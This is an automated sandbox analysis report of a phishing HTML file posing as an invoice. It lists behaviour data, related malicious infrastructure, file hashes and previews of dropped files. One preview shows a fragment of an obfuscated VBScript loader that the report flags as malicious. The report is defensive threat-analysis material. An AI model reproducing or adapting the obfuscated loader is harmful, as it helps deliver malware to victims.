                                          Overall analysis duration:0h 6m 23s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowshtmlcookbook.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:27
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:faktura_FV2025020660849.html
                                          (renamed file extension from htm_ to html)
                                          Original Sample Name:faktura_FV2025020660849.htm_
                                          Detection:MAL
                                          Classification:mal96.phis.expl.evad.winHTML@43/18@8/6
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
                                          • Excluded IPs from analysis (whitelisted): 142.250.186.174, 142.250.181.227, 142.250.181.238, 142.250.110.84, 142.250.186.78, 142.250.185.174, 172.217.16.206, 142.250.185.110, 88.221.110.121, 172.217.16.142, 142.250.184.206, 142.250.186.142, 23.60.203.209, 142.250.74.195, 34.104.35.123, 216.58.206.78, 142.250.186.110, 142.250.186.67, 23.199.214.10, 216.58.206.46, 172.217.18.110, 142.250.74.206, 172.217.18.14, 142.250.80.46, 173.194.17.198, 20.12.23.50
                                          • Excluded domains from analysis (whitelisted): clients1.google.com, r1.sn-hp57knd6.gvt1.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, r1---sn-hp57knd6.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, c.pki.goog
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          09:57:22API Interceptor43x Sleep call for process: powershell.exe modified
                                          09:57:23API Interceptor2x Sleep call for process: svchost.exe modified
                                          09:57:30API Interceptor3557037x Sleep call for process: unarchiver.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          149.56.240.132SUS.ps1Get hashmaliciousUnknownBrowse
                                            https://getwellslogsnowonline.vercel.app/Get hashmaliciousUnknownBrowse
                                              https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                  http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                    http://manatoki463.netGet hashmaliciousUnknownBrowse
                                                      https://ff-rewards-redeem-codes-org.github.io/Free-Fire-/Get hashmaliciousHTMLPhisherBrowse
                                                        https://www.google.com/url?rct=j&sa=t&url=https://saznao.pl/call/xbjbzvnqyv&ct=ga&cd=CAEYACoTMjk5MjE2NTQ2NzQ3ODY4ODc0NjIaNzRmM2RkZTE1NWFkOWUzMzpjb206ZW46VVM&usg=AOvVaw0lq_nCkEN7dcYMIXCg18TLGet hashmaliciousUnknownBrowse
                                                          https://techwormnea.pages.dev/posts/netflix-games-adds-10-new-titles-this-month/Get hashmaliciousUnknownBrowse
                                                            https://welcomewinner.com/?action=register&sub_id=RADIASI-CUBLUKGet hashmaliciousPhisherBrowse
                                                              54.39.128.117https://go-pdf.online/abap-development-for-financial-accounting-custom-enhancements.pdfGet hashmaliciousUnknownBrowse
                                                                http://beautiful-croquembouche-9e3d8d.netlify.app/Get hashmaliciousHTMLPhisherBrowse
                                                                  http://moremashup.comGet hashmaliciousUnknownBrowse
                                                                    https://links.us1.defend.egress.com/Warning?crId=668c13f0107db9b66b77d74e&Domain=lcatterton.com&Lang=en&Base64Url=eNo1i0FvgyAYQP8NR9FtXpaQhjRNywFNW3TRG6JT6WdhCtL46-elp5eXvDc4Z5dvjEMIUW9MD12kzIT9DIdZOaLRIolDu5J3CcrA5KVax6jbvPNN94jG56_BSgJg_RrM0Fr516J97yVSLTnSU0VHc88FS7PtEXNdfHGtPjLNdtKUD-YzO1dbfb4BF0VS_VzTWvAtn7K1ERYabcsiIL_0hOZrKUOc0OQF7HhfWGyvqlgvF8HifyPiRzE%3D&@OriginalLink=www.google.comGet hashmaliciousUnknownBrowse
                                                                      https://netflixsignupsa.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                        https://netflix-xfree-watch.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                          https://freefairemsx2022.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                            http://cubiclefoorce.com/?action=register&sub_id=LIGE_Get hashmaliciousPhisherBrowse
                                                                              https://claimnow12.finance.blog/cara-credit-union/Get hashmaliciousUnknownBrowse
                                                                                https://restartmmberswebsite.uscreen.io/Get hashmaliciousUnknownBrowse
                                                                                  156.229.228.198faktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    s4.histats.comfaktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 149.56.240.129
                                                                                    http://ww3.0123movies.com.coGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                    • 54.39.128.162
                                                                                    http://68.183.190.199Get hashmaliciousUnknownBrowse
                                                                                    • 149.56.240.130
                                                                                    SUS.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 142.4.219.198
                                                                                    analysis.vbsGet hashmaliciousUnknownBrowse
                                                                                    • 149.56.240.127
                                                                                    CfF7MWq7aG.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 142.4.219.198
                                                                                    https://getwellslogsnowonline.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                    • 149.56.240.132
                                                                                    https://fooofooofooo.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                                                    • 149.56.240.127
                                                                                    El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                                                                                    • 149.56.240.129
                                                                                    http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                                                    • 54.39.128.162

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    OVHFRAAHiVVNIKQESryT.exeGet hashmaliciousFormBookBrowse
                                                                                    • 51.222.255.207
                                                                                    http://observalgerie.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                    • 37.59.22.41
                                                                                    https://saleemitraders.com/wp/confirm.htmlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                    • 158.69.25.207
                                                                                    faktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 149.56.240.129
                                                                                    https://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                                    • 91.134.10.168
                                                                                    http://feirao2025.com.br/consulta/Get hashmaliciousUnknownBrowse
                                                                                    • 91.134.60.128
                                                                                    miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                    • 142.44.221.81
                                                                                    http://americanlibertywatch.comGet hashmaliciousUnknownBrowse
                                                                                    • 91.134.110.137
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 91.134.10.168
                                                                                    https://www.dkgroup.frGet hashmaliciousUnknownBrowse
                                                                                    • 137.74.137.164
                                                                                    ONL-HKOCEANNETWORKLIMITEDHKfaktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 156.229.228.198
                                                                                    resgod.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.249.107.21
                                                                                    cbr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.249.125.168
                                                                                    nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                    • 156.229.163.4
                                                                                    cbr.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.249.107.93
                                                                                    armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                    • 45.202.74.234
                                                                                    http://www.car1997.cn/Get hashmaliciousUnknownBrowse
                                                                                    • 45.202.81.19
                                                                                    Hilix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.249.107.33
                                                                                    pXdN91.x68.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 156.229.233.170
                                                                                    gmips.elfGet hashmaliciousUnknownBrowse
                                                                                    • 156.229.232.154
                                                                                    OVHFRAAHiVVNIKQESryT.exeGet hashmaliciousFormBookBrowse
                                                                                    • 51.222.255.207
                                                                                    http://observalgerie.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                    • 37.59.22.41
                                                                                    https://saleemitraders.com/wp/confirm.htmlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                    • 158.69.25.207
                                                                                    faktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 149.56.240.129
                                                                                    https://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                                    • 91.134.10.168
                                                                                    http://feirao2025.com.br/consulta/Get hashmaliciousUnknownBrowse
                                                                                    • 91.134.60.128
                                                                                    miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                    • 142.44.221.81
                                                                                    http://americanlibertywatch.comGet hashmaliciousUnknownBrowse
                                                                                    • 91.134.110.137
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 91.134.10.168
                                                                                    https://www.dkgroup.frGet hashmaliciousUnknownBrowse
                                                                                    • 137.74.137.164

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    37f463bf4616ecd445d4a1937da06e19ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                    • 54.39.128.117
                                                                                    Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 54.39.128.117
                                                                                    NDQ211216GM08.exe.bin.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 54.39.128.117
                                                                                    PO-USH3gS.pdf.pif.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 54.39.128.117
                                                                                    IPt9U27NoX.exeGet hashmaliciousUnknownBrowse
                                                                                    • 54.39.128.117
                                                                                    IPt9U27NoX.exeGet hashmaliciousUnknownBrowse
                                                                                    • 54.39.128.117
                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 54.39.128.117
                                                                                    443_2003_https-df.exeGet hashmaliciousMetasploitBrowse
                                                                                    • 54.39.128.117
                                                                                    443_2003_https-df.exeGet hashmaliciousMetasploitBrowse
                                                                                    • 54.39.128.117
                                                                                    faktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 54.39.128.117

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1310720
                                                                                    Entropy (8bit):0.735557597885903
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqB:2JIB/wUKUKQncEmYRTwh0q
                                                                                    MD5:655DF1692A261A5F9C38B24097014925
                                                                                    SHA1:382307A069449496FE15D3E1C8562B2F708C6996
                                                                                    SHA-256:CC112AC30D46AFC6335233FC0D443A0B5371D531E458B916EA8CEF4932C326F7
                                                                                    SHA-512:365BEFB1FD1619E445E1DB83FB83A10C97493C4B1F6AEAB67F288D4089FB3EE2EB77D7C2C8C77026CB3A14D4F2DE1A77C106CE388E218E3000EB9A8537FE31EF
                                                                                    Malicious:false
                                                                                    Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x32dc5043, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                    Category:dropped
                                                                                    Size (bytes):1310720
                                                                                    Entropy (8bit):0.7899734534948286
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii
                                                                                    MD5:1D2D99E435E5EBECFEFA81CDE4D008B5
                                                                                    SHA1:A88AD19715F5CAD50E3A49A84CEEA3C38994C8CF
                                                                                    SHA-256:831CD0923A3839B943B3ABC90F0DAB7EE03FD3BE8A659438170FACD5B40C17DF
                                                                                    SHA-512:405BACAC946462FF55E9295FF5EB3E5BFE5B83425457967105DB1F00F4E9FDE3CBD561DB481AF92C2B93D7F81A5AA1C9C8215268B3C3D5019F86C246105B84E7
                                                                                    Malicious:false
                                                                                    Preview:2.PC... ...............X\...;...{......................0.`.....42...{5..9...}..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.......................................9...}......................9...}...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):16384
                                                                                    Entropy (8bit):0.08232479483117672
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:5l8YeFZ7Ag1t/57Dek3JXAmr/ollEqW3l/TjzzQ/t:5l8zFZ7FHR3tXA0Amd8/
                                                                                    MD5:C37449C3E3EA0C8D210BE39656ECF02B
                                                                                    SHA1:DBD64E31C1007A965E640384987C9488BC22B3CB
                                                                                    SHA-256:E9438B75BD61036B2B6B70346054EA8EE6AC791ACCE87B7ADE1A4BCBB2D14D92
                                                                                    SHA-512:F2DC530B32DB4A4E31AC82F4073378239783D973C87ECB62F9D1DF0897139E89C0B8D9180686AAB5F5CA03FA1107B5D5098FB877F11C5360C2ECC83570D855AA
                                                                                    Malicious:false
                                                                                    Preview:k........................................;...{...9...}..42...{5.........42...{5.42...{5...Y.42...{59....................9...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\0[1].htm

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):376
                                                                                    Entropy (8bit):5.175134110355963
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
                                                                                    MD5:C2B26B17141E97DA490556030D44F1C3
                                                                                    SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
                                                                                    SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
                                                                                    SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
                                                                                    Malicious:false
                                                                                    Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):5829
                                                                                    Entropy (8bit):4.901113710259376
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                    Malicious:false
                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxgad0fs.cqe.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o14gwztu.ghd.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:ASCII text, with very long lines (14015), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):14015
                                                                                    Entropy (8bit):3.9102728499186745
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:QmBbwxoxcXU2AJuF97cOtU1hgwuivpiidGugW2Gu:QmFwxoSTAJuFdcuyfpiWGdW2Gu
                                                                                    MD5:BE8C1EE00493E87E2F2B4620F86CCACB
                                                                                    SHA1:6A63A153E6596D90A67138770F5768DD15ADBCF1
                                                                                    SHA-256:C16A1E7CC14C7B9134515A85A9F174A97C8A07CEEBE934CB305DE757E8005B0F
                                                                                    SHA-512:BDAD88DEC5ABFD6B3F34CFF00116502C2735256971F6A76231CB25D7B01A8A6620ADF6B8D2275107411F0E2062F1EBB0D14BC6AA42A34FFC68F216873CA23418
                                                                                    Malicious:true
                                                                                    Preview:wDBRdQvkDPBpkpilJJks = Split("FobLLkfrsr EacbLLkfrsh veMetxuqAFPYyiNziuUbWN IbLLkfrsn SpbLLkfrslit(""-362/bLLkfrs2I-450/bLLkfrs3I-561+333I-213+22I29-175I-122-24I136-285I-489+343I-402+174I132-310I202-361I-226+81I-429/bLLkfrs3I-346+195I89-248I-912/bLLkfrs4I-637+455I-636/4I-420/3I-81-63I-912/4I-606/3I136-364I271-499I-609+381I-531/3I-636/4I-206+62I-193-35I-155+9I202-361I-614+467I-329+148I310-472I-308/2I-703+475I100-299I-170-58I269-462I-523+377I-318/2I-441+278I-202+58I-636/4I-724/4I-66-96I-357+203I-122-37I-483/3I257-401I16-236I-461+235I-604/4I-157+12I-480+340I-604/4I-608/4I130-340I-856/4I-230+90I311-462I-259+107I-609+453I-576/4I-379+235I-197+49I205-431I-475+256I-382+154I-469+267I-317+89I-352+124I-415+187I-207+14I-480+317I-406+254I-397+245I-227-1I-202+56I337-496I-135-12I-724/4I223-385I-308/2I-642/3I-253+72I-256+108I-477/3I-450/3I-440/2I-32-194I161-350I-419+260I-342+198I-678/3I-648/3I33-261I-904/4I-30-126I-193+49I-200+56I-420+272I-134-11I-606/3I-39-174I-852/4I289-434I-449+241I284-498I-38-118I

                                                                                    C:\Users\user\AppData\Local\Temp\unarchiver.log

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\unarchiver.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1499
                                                                                    Entropy (8bit):5.209211003937342
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:mp+L6EOiJliJjWIliJliJUwR1iJfMiJliJFTrp+9iJb/iJup+9iJo69iJniJliJt:mM2GlGblGlGpDGEGlGpriGb/GuiG9Gnv
                                                                                    MD5:46DC3F5EB5800015B14639AFACE154DF
                                                                                    SHA1:8509F1B88BCFBBFA0BC59C7719D7ED845E27418F
                                                                                    SHA-256:6F6D881F5F2A0EF53BBEE47C2B7DDA38A2302842D59D73604F84F2939D8D5DF0
                                                                                    SHA-512:62F571F8CF80652255EA747AC5EC124852007F626F40B3EFFA95C5E7F53D163C1B409AD6A5D2713E9653041D5CF53765441B9CD4D1280534A32E238851CBE99D
                                                                                    Malicious:false
                                                                                    Preview:03/13/2025 9:56 AM: Unpack: C:\Users\user\Downloads\faktura_FV2025020660849.zip..03/13/2025 9:56 AM: Tmp dir: C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg..03/13/2025 9:56 AM: Received from standard out: ..03/13/2025 9:56 AM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..03/13/2025 9:56 AM: Received from standard out: ..03/13/2025 9:56 AM: Received from standard out: Scanning the drive for archives:..03/13/2025 9:56 AM: Received from standard out: 1 file, 14147 bytes (14 KiB)..03/13/2025 9:56 AM: Received from standard out: ..03/13/2025 9:56 AM: Received from standard out: Extracting archive: C:\Users\user\Downloads\faktura_FV2025020660849.zip..03/13/2025 9:56 AM: Received from standard out: --..03/13/2025 9:56 AM: Received from standard out: Path = C:\Users\user\Downloads\faktura_FV2025020660849.zip..03/13/2025 9:56 AM: Received from standard out: Type = zip..03/13/2025 9:56 AM: Received from standard out: Physic

                                                                                    C:\Users\user\Downloads\dd874d12-8b59-4b0d-98a4-3b7b67550140.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):7910
                                                                                    Entropy (8bit):3.82235901804059
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:wK4wEBEikjxVyxovvGtp4lMM0Ry2YAoxauF97va+VQ5HuD2IypLFk:7mBbwxoxcXU2AJuF97cOtUW
                                                                                    MD5:3D8472423BE0CC8FAA46C9DACC82B705
                                                                                    SHA1:7EE4F3BB1B772F58A0E0D9E30E44FDA68FF72AA9
                                                                                    SHA-256:BE5B44FF8C9CDA2A064693329829C5F2FDF94FE51AB027AFCC5F68E74F9AB982
                                                                                    SHA-512:F842EC74E5F61FD69B2BA4F22B514FAA72FE7EED7BF6DF6D34DACC65A7B2D4C74C45917D7C80172F3E8869CCBF77F2C476922EA4FB0CDC303483828276846E09
                                                                                    Malicious:false
                                                                                    Preview:PK........iPjZ.+.k.6...6......2025020665304.vbswDBRdQvkDPBpkpilJJks = Split("FobLLkfrsr EacbLLkfrsh veMetxuqAFPYyiNziuUbWN IbLLkfrsn SpbLLkfrslit(""-362/bLLkfrs2I-450/bLLkfrs3I-561+333I-213+22I29-175I-122-24I136-285I-489+343I-402+174I132-310I202-361I-226+81I-429/bLLkfrs3I-346+195I89-248I-912/bLLkfrs4I-637+455I-636/4I-420/3I-81-63I-912/4I-606/3I136-364I271-499I-609+381I-531/3I-636/4I-206+62I-193-35I-155+9I202-361I-614+467I-329+148I310-472I-308/2I-703+475I100-299I-170-58I269-462I-523+377I-318/2I-441+278I-202+58I-636/4I-724/4I-66-96I-357+203I-122-37I-483/3I257-401I16-236I-461+235I-604/4I-157+12I-480+340I-604/4I-608/4I130-340I-856/4I-230+90I311-462I-259+107I-609+453I-576/4I-379+235I-197+49I205-431I-475+256I-382+154I-469+267I-317+89I-352+124I-415+187I-207+14I-480+317I-406+254I-397+245I-227-1I-202+56I337-496I-135-12I-724/4I223-385I-308/2I-642/3I-253+72I-256+108I-477/3I-450/3I-440/2I-32-194I161-350I-419+260I-342+198I-678/3I-648/3I33-261I-904/4I-30-126I-193+49I-200+56I-420+272I-134-11I-606/3I-

                                                                                    C:\Users\user\Downloads\faktura_FV2025020660849.zip (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):14147
                                                                                    Entropy (8bit):3.9604232362411484
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:7mBbwxoxcXU2AJuF97cOtU1hgwuivpiidGugW2Gj:7mFwxoSTAJuFdcuyfpiWGdW2Gj
                                                                                    MD5:29A9EB399DB24ABE418EAB3960EEA15C
                                                                                    SHA1:CDC96AFDA25D062B3E5DEDCB93145B307459DD8D
                                                                                    SHA-256:F7F18704200A83CAAF96CC57E8688CC12FE270B2DBF041DD5B132B0F453CD690
                                                                                    SHA-512:115437BF107D346FB11EDD48B964AF550A6D4CACD76D87FCBFE0FD68C9DDBFA4FB317313659D598409E456D9202E15797B7AD6401D125553F0C819B9A1CE68F7
                                                                                    Malicious:true
